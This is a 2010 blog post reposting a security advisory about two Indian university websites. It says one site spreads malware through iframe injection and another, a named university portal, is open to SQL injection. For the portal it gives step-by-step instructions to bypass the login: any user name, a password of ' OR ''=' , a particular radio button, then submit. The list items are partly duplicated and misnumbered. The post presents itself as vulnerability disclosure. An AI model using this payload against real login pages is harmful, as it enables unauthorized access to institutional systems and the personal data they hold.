Saturday, July 24, 2010

Indian University Websites : biggest Indian University Websites are vulnerable

Users of Indian University Websites please be advised of a biggest Indian University Websites vulnerability that has been identified.

To view this vulnerability, possible remedies, and others please check out the Security Advisories at Critical Watch (http://criticalwatch.com/support/security-advisories.aspx)

Amplify’d from www.criticalwatch.com

Indian University Websites-SA-07/17/2010: Two biggest Indian University Websites are vulnerable

) Calcutta University website is spreading malware via iframe code

insertion.
a) Sikkim Manipal University portal is vulnerable to SQL Injection attack.

b) Calcutta University website is spreading malware via iframe code

insertion.



a) About the university: Sikkim Manipal is one of the largest private

University in India. The Institute attracts students from all over the

country, with over 1700 students enrolled in the various engineering

disciplines. 102 full-time faculties are employed.



Type of problem: SQL Injection



Vulnerable Portal: http://portal.smude.edu.in/



User Name: *sanjay*

[any name will work]

Password: *' OR ''='

*Choose "*Center Login*" radio button

Press SUBMIT.



Screenshot: http://www.isolutionindia.com/isolutionindia/disclosure/SM.JPG
Read more at www.criticalwatch.com
 

No comments:

Post a Comment